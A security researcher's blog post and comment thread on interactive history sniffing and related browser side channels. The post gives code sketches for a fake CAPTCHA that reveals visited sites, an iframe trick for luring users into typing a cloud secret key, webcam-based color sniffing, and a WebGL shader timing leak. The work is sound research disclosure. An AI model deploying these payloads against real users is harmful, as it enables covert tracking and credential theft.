Interactive history sniffing and its relatives

Readers of this blog will probably already know that, up till the middle of last year, it was possible to sniff browsing history by clever tricks involving CSS, JavaScript, and the venerable tradition of drawing hyperlinks to already-visited URLs in purple instead of blue. Last year, though, David Baron came up with a defense against history sniffing which has now been adopted by every major browser except Opera. One fewer thing to worry about when visiting the internets, hooray? Not so fast.

Imagine for a moment that the next time you visited an unfamiliar website and wanted to leave a comment without creating an account, instead of one of those illegibly distorted codes that you have to type back in, you saw this:

Please click on all the chess pawns.

[Image: a six-by-six checkerboard grid with chess pawns in random locations. One of the pawns is green and has a mouse-cursor arrow pointing to it.]

As you click on the pawns, they turn green. Nifty, innit? Much easier than an illegibly distorted code. Also easy for a spambot equipped with image-processing software, but it turns out the distorted codes are not that hard for spambots anymore either, and probably no one’s written the necessary image-processing code for this one yet. Possibly also easier on people with poor eyesight, and there could still be a link to an audio challenge for people with no eyesight.

… What’s this got to do with history sniffing? That chessboard isn’t really a CAPTCHA. All the squares have pawns on them, but each pawn is a hyperlink, and the pawns linked to sites you haven’t visited are drawn in the same color as their squares, so they’re invisible. You only click on the pawns you can see, of course, and so you reveal to the site which of those URLs you have visited. A little technical cleverness is required (the pawns have to be Unicode dingbats, not images; all the normal interactive behavior of hyperlinks has to be suppressed; and so on), but nothing too difficult. Three other researchers with CMU Silicon Valley’s Web Security Group and I have tested this and a few other such fake CAPTCHAs on 300 people. We found them to be practical, although you have to be careful not to make the task too hard; for details, please see our paper (to be presented at the IEEE Symposium on Security and Privacy, aka Oakland 2011).
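
To give a flavor of the trick, here is a minimal sketch of a single chessboard square. The class names, colors, and URL are made up for illustration; a real attack would style things much more carefully:

    <style>
      .square { background: #eeeeee; width: 2em; height: 2em;
                text-align: center; font-size: 2em; }
      /* Unvisited pawns match the square, so they are invisible;
         also suppress the underline and the pointer cursor. */
      .square a { color: #eeeeee; text-decoration: none; cursor: default; }
      /* Baron's defense still lets :visited change color; it hides
         the difference from scripts, not from human eyes. */
      .square a:visited { color: #000000; }
    </style>
    <div class="square">
      <!-- The pawn must be a text glyph (U+265F), not an image, or it
           would not take the :visited color. The onclick handler turns
           the pawn green and suppresses actual navigation. -->
      <a href="http://competitor.example/" tabindex="-1"
         onclick="this.style.color = '#00cc00'; return false;">&#9823;</a>
    </div>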

An attacker obviously can’t use an interactive sniffing attack like this one to find out which sites out of the entire Alexa 10K your victim has visited—nobody’s going to work through that many chessboards—and for the same reason, deanonymization attacks that require the attacker to probe hundreds of thousands of URLs are out of reach. However, an attacker could reasonably probe a couple hundred URLs with an interactive attack, and according to Dongseok Jang’s study of actual history sniffing (paper), that’s about how many URLs real attackers want to sniff. It seems that the main thing real attackers want to know about your browsing history is which of their competitors you patronize, and that’s never going to need more than a few dozen URLs.

On the other hand, CAPTCHAs are such a hassle for users that they cause 10% to 33% attrition in conversion rates. And users don’t expect to see them on every visit to a site—just the first, usually, or each time they submit an anonymous comment. Even websites that were sniffing history when it was possible to do so automatically, and want to keep doing it, may consider that too high a price. But we can imagine similar attacks on higher-value information, where even a tiny success rate would be worth it. For instance, a malicious site could ask you to type a string of gibberish to continue—which happens to be your Amazon Web Services secret access key, IFRAMEd in from their management console. Amazon has taken steps to make this precise scenario difficult, but I’m not prepared to swear that it’s impossible, and other cloud services providers may have been less cautious.
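
For concreteness, the framing half of that attack might look something like the sketch below. The URL and pixel offsets are hypothetical, and a framing defense such as the X-Frame-Options header is exactly the kind of step that blocks it:

    <p>Anti-spam check: please type the code you see below.</p>
    <!-- The "code" is really a cropped view of the victim's own
         credentials page, loaded cross-domain. The offsets would be
         chosen so that only the secret string shows through. -->
    <div style="width: 330px; height: 22px; overflow: hidden;
                position: relative;">
      <iframe src="https://console.cloud.example/credentials"
              scrolling="no"
              style="position: absolute; top: -215px; left: -60px;
                     width: 1000px; height: 700px; border: none;"></iframe>
    </div>
    <input type="text" name="captcha-response">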

Going forward, we also need to think carefully about how new web-platform capabilities might enable attackers to make similar end-runs around the browser’s security policies. In the same research project, we were able to sniff history without user interaction by using a webcam to detect the color of the light reflecting off the user’s face; even with our remarkably crude image-processing code, this worked great as long as the user held still. It’s not terribly practical, because the user has to grant access to their webcam, and it involves putting an annoying flashing box on the screen, but it demonstrates the problem. We are particularly concerned about WebGL right now, since its shader programs can perform arbitrary computations and have access to cross-domain content that page JavaScript cannot see; there may well be a way for them to communicate back to page JavaScript that avoids the <canvas> element’s information-leakage rules. Right now it’s not possible to put the rendering of a web page into a GL texture, so this couldn’t be used to snoop on browsing history, but there are legitimate reasons to want to do that, so it might become possible in the future.
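
To give a sense of the webcam variant, the measurement side is conceptually just a brightness average. The sketch below uses the modern getUserMedia API and omits all the frame averaging and calibration the real code needs; the probe element it refers to would be a huge hyperlink-colored box, styled so that :visited makes it white and unvisited black:

    // Scripts cannot read the probe's color directly (Baron's defense
    // lies to them), but the camera can see its reflection.
    async function frameBrightness() {
      const video = document.createElement('video');
      video.srcObject =
        await navigator.mediaDevices.getUserMedia({ video: true });
      await video.play();
      const c = document.createElement('canvas');
      c.width = 64; c.height = 48;       // tiny: we only need an average
      const ctx = c.getContext('2d');
      ctx.drawImage(video, 0, 0, c.width, c.height);
      const px = ctx.getImageData(0, 0, c.width, c.height).data;
      let sum = 0;
      for (let i = 0; i < px.length; i += 4)
        sum += px[i] + px[i + 1] + px[i + 2];  // R + G + B per pixel
      return sum / (px.length / 4);            // 0 (black) to 765 (white)
    }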

Responses to “Interactive history sniffing and its relatives”

  1. voracity

    Interesting and important to think about, but I don’t see much to be concerned about. Especially since each of these attacks requires the user to first visit a malicious site, which is pretty rare, and then to interact with it in a pretty extensive way, which is even rarer.

    Also, I’ve anecdotally noticed that the incidence of such visits (by the range of people I’m familiar with) has been decreasing gradually over time as their online experience grows. (It would be wonderful to get some data to find out if this is generally the case.)

    And I’m happy to see that blocking 3rd party cookies by default is in the plans for upcoming Firefox versions. I’ve been pleading for this for a very long time. (That would resolve the Amazon issue, no?) ALL user-specific 3rd party information should be blocked by default! (Like XHR, visited links, etc.)

    1. Zack Weinberg

      …each of these attacks requires the user to first visit a malicious site, which is pretty rare, and then to interact with it in a pretty extensive way, which is even rarer.

      Right, that’s why I said I was more concerned with similar attacks on higher-value information. You only need to steal a few AWS secret keys to make it worth the trouble.

      …the incidence of such visits (by the range of people I’m familiar with) has been decreasing gradually over time as their online experience grows. (It would be wonderful to get some data to find out if this is generally the case.)

      Off the top of my head, I don’t see how to do that study in an ethical way, but if you have ideas, I’d love to hear them.

      ALL user-specific 3rd party information should be blocked by default!

      The trouble is doing that without breaking the Web … my bank’s website, for instance, breaks horribly with third-party cookies disabled, and they will not be persuaded to change it (I’ve tried).

      I am increasingly of the opinion that everything, even images, should require an opt-in in the HTTP headers to be loadable cross-domain, but we’d need a time machine to change that one.
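
      Concretely, I mean something in the spirit of the CORS response headers, but mandatory for every embedded resource: a cross-domain <img> would simply fail to load unless the image’s server answered with something like

          HTTP/1.1 200 OK
          Content-Type: image/png
          Access-Control-Allow-Origin: https://embedding-site.example

      (The header shown is the real CORS one; requiring it for plain image loads is the hypothetical part.)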

      1. voracity

        You only need to steal a few AWS secret keys to make it worth the trouble.

        Granted. But the keys (or secrets) stolen have to be important ones and phishers can’t be choosers. And as the importance of a secret increases, so too does the number of security measures employed to protect it. I’m not suggesting that a big breach can’t happen. (Importance isn’t always recognised; Sony’s recent issues ram this point home, even if that was the result of a more traditional open backdoor.) I’m suggesting the probability (or, rather, expected cost) is low enough that these issues can be set aside in favour of the holy grail: proper protection of all user-specific 3rd party communications.

        The trouble is doing that without breaking the Web.

        I would have thought the current situation is grievous enough for all browser makers to unite and fix the problem — there are plenty of self-interest reasons to unite for this one. Have there been discussions amongst the browser makers about it?

  2. Benoit Jacob

    Let me know if you have questions about WebGL.

    I’m not sure what’s meant by “have access to cross-domain content that page JavaScript cannot see”; do you mean in the case of a very serious vulnerability in the graphics drivers? In that case, we would respond by blacklisting those drivers. We have blacklisted WebGL on Mac OS X 10.5 altogether for exactly that reason.

    My main concern about WebGL is how it leaks more bits of uniquely identifying information (fingerprinting). I’m available to discuss this too if you are interested.

    1. Zack Weinberg

      I mean loading an <img> or a <video> cross-domain, pulling its contents into a texture, and then looping over the pixels in a shader. This is allowed by the spec, but the resulting canvas contents are tainted, so page JS can’t read them. But there may be a covert channel that the shader can use to tell page JS what it saw; maybe only one bit (rendering completion time?), but that would be enough for some attacks.

      Image contents are usually not that sensitive, but you never know.
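
      To sketch what I have in mind (compileProgram, vertSrc, and THRESHOLD are placeholders, and assume gl already has the cross-domain image bound as u_tex):

          // Fragment shader whose running time depends on the sampled
          // texel: the brighter the pixel, the more loop iterations.
          const fragSrc = `
            precision mediump float;
            uniform sampler2D u_tex;
            void main() {
              float v = texture2D(u_tex, vec2(0.5, 0.5)).r;
              float acc = 0.0;
              for (int i = 0; i < 10000; i++) {     // constant bound (GLSL ES)
                if (float(i) > v * 10000.0) break;  // data-dependent exit
                acc += sin(float(i));
              }
              gl_FragColor = vec4(fract(acc));
            }`;
          const prog = compileProgram(gl, vertSrc, fragSrc); // placeholder
          gl.useProgram(prog);
          const t0 = performance.now();
          gl.drawArrays(gl.TRIANGLES, 0, 3);
          gl.finish();                    // block until the GPU is done
          const bit = (performance.now() - t0) > THRESHOLD;

      The canvas stays tainted throughout; the only thing page JS ever reads is the clock.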

      1. Benoit Jacob

        OK. The only way I can see that JS could read that data would be via a webgl.readPixels() call on a framebuffer to which said texture had been blitted. The readPixels() function already has safety checks, but I’m not sure offhand whether it handles the case you are describing.

          1. Benoit Jacob

            I checked the implementation; it calls nsContentUtils::IsCallerTrustedForRead().

          2. Zack Weinberg

            That effectively makes it chrome-only. It might not be necessary to be that restrictive.

  3. Benoit Jacob

    We have a plan to add a chrome-only (as opposed to content) WebGL extension that allows reading arbitrary DOM elements into textures, mostly to help the GSoC project on Tilt. But obviously we’re not going to allow content to do that.

    1. Zack Weinberg

      There’s already canvas.drawWindow, which only chrome can use. Thing is, I can think of legitimate uses for that within a web application … shame about the whole can of cross-domain information-leakage worms.
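
      For anyone following along, chrome-side usage looks roughly like this (the window and dimensions are whatever the caller wants):

          // Privileged Mozilla-only API; not callable from web content.
          // Signature: drawWindow(window, x, y, w, h, bgColor[, flags]).
          const ctx = canvas.getContext('2d');
          ctx.drawWindow(contentWindow, 0, 0, 800, 600, 'rgb(255,255,255)');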

      1. Benoit Jacob

        The problem with drawWindow is that when we are using hardware-accelerated layers, having to read textures back into main memory is very bad for performance. A WebGL extension to load DOM elements into textures would have the advantage that when content is already in texture memory, it can stay there.

        1. Zack Weinberg

          From my (security) perspective, it doesn’t matter how the image of a rendered page gets to a place where shader programs can examine its pixels…

          1. Benoit Jacob

            Understood; anyway, our WebGL extension would be chrome-only, too.